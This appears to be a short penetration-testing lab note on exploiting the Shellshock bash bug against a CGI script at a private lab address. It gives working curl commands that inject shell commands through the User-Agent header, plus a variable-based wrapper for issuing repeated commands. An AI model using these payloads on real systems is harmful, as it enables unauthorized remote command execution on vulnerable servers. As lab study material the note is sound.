Backlink: reference-notes-readme

Controlling the Web Shell from the Terminal

Shellshock PoC Usage

Posting Initial Payload

As detailed in the ShellShock PoC, in this particular exploit we use curl to post the payload to the shell. The output of the command is returned to curl and printed to our terminal, however the output is going to be extremely ugly. We can clean up a ton of this and just print the payload command returned output by piping the curl output to sed:

curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; uname -a; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'

Posting Subsequent Payloads

Instead of spending time keying over to the payload portion of the command in the terminal each time we want to run a new command, we can use Bash's ability to declare variables to speed this process up significantly.

cmd="id"
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; ${cmd}; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s \ | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
cmd="hostname -f"